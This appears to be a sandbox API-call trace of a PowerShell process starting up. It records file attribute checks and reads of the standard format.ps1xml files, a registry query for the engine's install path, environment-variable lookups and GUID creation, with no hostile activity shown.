	[0470.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3e0 | out: lpFileInformation=0x16d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0470.044] SetErrorMode (uMode=0x1) returned 0x1
	[0470.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0470.044] SetErrorMode (uMode=0x1) returned 0x1
	[0470.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3e0 | out: lpFileInformation=0x16d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0470.044] SetErrorMode (uMode=0x1) returned 0x1
	[0470.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.045] SetErrorMode (uMode=0x1) returned 0x1
	[0470.045] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3e0 | out: lpFileInformation=0x16d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0470.045] SetErrorMode (uMode=0x1) returned 0x1
	[0470.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.045] SetErrorMode (uMode=0x1) returned 0x1
	[0470.045] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3e0 | out: lpFileInformation=0x16d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0470.045] SetErrorMode (uMode=0x1) returned 0x1
	[0470.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0470.045] SetErrorMode (uMode=0x1) returned 0x1
	[0470.045] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3e0 | out: lpFileInformation=0x16d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0470.046] SetErrorMode (uMode=0x1) returned 0x1
	[0470.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0470.046] SetErrorMode (uMode=0x1) returned 0x1
	[0470.046] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3e0 | out: lpFileInformation=0x16d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0470.046] SetErrorMode (uMode=0x1) returned 0x1
	[0470.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0470.046] SetErrorMode (uMode=0x1) returned 0x1
	[0470.046] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3e0 | out: lpFileInformation=0x16d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0470.046] SetErrorMode (uMode=0x1) returned 0x1
	[0470.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0470.328] SetErrorMode (uMode=0x1) returned 0x1
	[0470.328] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3e0 | out: lpFileInformation=0x16d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0470.328] SetErrorMode (uMode=0x1) returned 0x1
	[0470.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0470.329] SetErrorMode (uMode=0x1) returned 0x1
	[0470.329] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3e0 | out: lpFileInformation=0x16d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0470.329] SetErrorMode (uMode=0x1) returned 0x1
	[0470.330] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0470.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.330] CoTaskMemFree (pv=0x252f10) 
	[0470.339] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0470.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.339] CoTaskMemFree (pv=0x252f10) 
	[0470.340] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0470.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.340] CoTaskMemFree (pv=0x252f10) 
	[0470.340] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0470.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.340] CoTaskMemFree (pv=0x252f10) 
	[0470.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.341] SetErrorMode (uMode=0x1) returned 0x1
	[0470.341] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0470.341] GetFileType (hFile=0x314) returned 0x1
	[0470.341] SetErrorMode (uMode=0x1) returned 0x1
	[0470.341] GetFileType (hFile=0x314) returned 0x1
	[0470.341] ReadFile (in: hFile=0x314, lpBuffer=0x33bb198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33bb198*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.343] ReadFile (in: hFile=0x314, lpBuffer=0x33bb198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33bb198*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.343] ReadFile (in: hFile=0x314, lpBuffer=0x33bb198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33bb198*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.343] ReadFile (in: hFile=0x314, lpBuffer=0x33bb198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33bb198*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.344] ReadFile (in: hFile=0x314, lpBuffer=0x33bb198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33bb198*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.344] ReadFile (in: hFile=0x314, lpBuffer=0x33bb198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33bb198*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.344] ReadFile (in: hFile=0x314, lpBuffer=0x33bb198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33bb198*, lpNumberOfBytesRead=0x16d078*=0x9e2, lpOverlapped=0x0) returned 1
	[0470.344] ReadFile (in: hFile=0x314, lpBuffer=0x33ba6e2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33ba6e2*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0470.344] ReadFile (in: hFile=0x314, lpBuffer=0x33bb198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33bb198*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0470.345] CloseHandle (hObject=0x314) returned 1
	[0470.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.345] SetErrorMode (uMode=0x1) returned 0x1
	[0470.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d020 | out: lpFileInformation=0x16d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0470.345] SetErrorMode (uMode=0x1) returned 0x1
	[0470.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.345] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d108 | out: phkResult=0x16d108*=0x314) returned 0x0
	[0470.345] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d08c, lpData=0x0, lpcbData=0x16d088*=0x0 | out: lpType=0x16d08c*=0x1, lpData=0x0, lpcbData=0x16d088*=0x56) returned 0x0
	[0470.345] CoTaskMemAlloc (cb=0x5a) returned 0x1b818c60
	[0470.345] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d05c, lpData=0x1b818c60, lpcbData=0x16d058*=0x56 | out: lpType=0x16d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d058*=0x56) returned 0x0
	[0470.345] CoTaskMemFree (pv=0x1b818c60) 
	[0470.346] RegCloseKey (hKey=0x314) returned 0x0
	[0470.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.354] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x23aea2a9, Data2=0x69c3, Data3=0x4c4f, Data4=([0]=0xb3, [1]=0x7a, [2]=0x58, [3]=0xe4, [4]=0x5f, [5]=0xf9, [6]=0xaf, [7]=0xaf))) returned 0x0
	[0470.677] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xfcc82abd, Data2=0x799b, Data3=0x4f24, Data4=([0]=0x9d, [1]=0x1b, [2]=0x6, [3]=0x94, [4]=0x5e, [5]=0x6c, [6]=0x5d, [7]=0x7d))) returned 0x0
	[0470.680] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0470.681] GetFileType (hFile=0x314) returned 0x1
	[0470.681] SetErrorMode (uMode=0x1) returned 0x1
	[0470.681] GetFileType (hFile=0x314) returned 0x1
	[0470.681] ReadFile (in: hFile=0x314, lpBuffer=0x33e5d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33e5d00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.682] ReadFile (in: hFile=0x314, lpBuffer=0x33e5d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33e5d00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.683] ReadFile (in: hFile=0x314, lpBuffer=0x33e5d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33e5d00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.683] ReadFile (in: hFile=0x314, lpBuffer=0x33e5d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33e5d00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.683] ReadFile (in: hFile=0x314, lpBuffer=0x33e5d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33e5d00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.684] ReadFile (in: hFile=0x314, lpBuffer=0x33e5d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33e5d00*, lpNumberOfBytesRead=0x16d078*=0xfb2, lpOverlapped=0x0) returned 1
	[0470.684] ReadFile (in: hFile=0x314, lpBuffer=0x33e541a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33e541a*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0470.684] ReadFile (in: hFile=0x314, lpBuffer=0x33e5d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x33e5d00*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0470.684] CloseHandle (hObject=0x314) returned 1
	[0470.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0470.685] SetErrorMode (uMode=0x1) returned 0x1
	[0470.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d020 | out: lpFileInformation=0x16d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0470.685] SetErrorMode (uMode=0x1) returned 0x1
	[0470.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0470.685] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d108 | out: phkResult=0x16d108*=0x314) returned 0x0
	[0470.685] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d08c, lpData=0x0, lpcbData=0x16d088*=0x0 | out: lpType=0x16d08c*=0x1, lpData=0x0, lpcbData=0x16d088*=0x56) returned 0x0
	[0470.685] CoTaskMemAlloc (cb=0x5a) returned 0x1b818c60
	[0470.685] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d05c, lpData=0x1b818c60, lpcbData=0x16d058*=0x56 | out: lpType=0x16d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d058*=0x56) returned 0x0
	[0470.685] CoTaskMemFree (pv=0x1b818c60) 
	[0470.686] RegCloseKey (hKey=0x314) returned 0x0
	[0470.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0470.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0470.687] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x214522b4, Data2=0xb5b4, Data3=0x48b0, Data4=([0]=0xa6, [1]=0xbf, [2]=0x63, [3]=0x44, [4]=0x51, [5]=0xe2, [6]=0xf, [7]=0x2d))) returned 0x0
	[0470.692] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x3039a2fa, Data2=0xf5b3, Data3=0x4f83, Data4=([0]=0xa4, [1]=0xb2, [2]=0x5b, [3]=0xa6, [4]=0x9f, [5]=0x29, [6]=0xaa, [7]=0x96))) returned 0x0
	[0470.693] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xa0fc0875, Data2=0x5548, Data3=0x449a, Data4=([0]=0x96, [1]=0x5b, [2]=0x34, [3]=0x9c, [4]=0xc8, [5]=0xa6, [6]=0x42, [7]=0x46))) returned 0x0
	[0470.694] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x359fd947, Data2=0x111e, Data3=0x4ff7, Data4=([0]=0xb0, [1]=0x11, [2]=0x4b, [3]=0xc6, [4]=0x5a, [5]=0xbb, [6]=0xa7, [7]=0xe0))) returned 0x0
	[0470.695] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x9ff60394, Data2=0x8da, Data3=0x49bc, Data4=([0]=0xb1, [1]=0x70, [2]=0xc, [3]=0xdc, [4]=0x57, [5]=0xf2, [6]=0xb6, [7]=0xf2))) returned 0x0
	[0470.695] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x190f5cc7, Data2=0x7207, Data3=0x4bb2, Data4=([0]=0x9b, [1]=0x1c, [2]=0xba, [3]=0xd4, [4]=0xba, [5]=0x2e, [6]=0x6d, [7]=0xde))) returned 0x0
	[0470.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.696] SetErrorMode (uMode=0x1) returned 0x1
	[0470.696] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0470.696] GetFileType (hFile=0x314) returned 0x1
	[0470.696] SetErrorMode (uMode=0x1) returned 0x1
	[0470.696] GetFileType (hFile=0x314) returned 0x1
	[0470.696] ReadFile (in: hFile=0x314, lpBuffer=0x3431a60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3431a60*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.698] ReadFile (in: hFile=0x314, lpBuffer=0x3431a60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3431a60*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.698] ReadFile (in: hFile=0x314, lpBuffer=0x3431a60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3431a60*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.698] ReadFile (in: hFile=0x314, lpBuffer=0x3431a60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3431a60*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
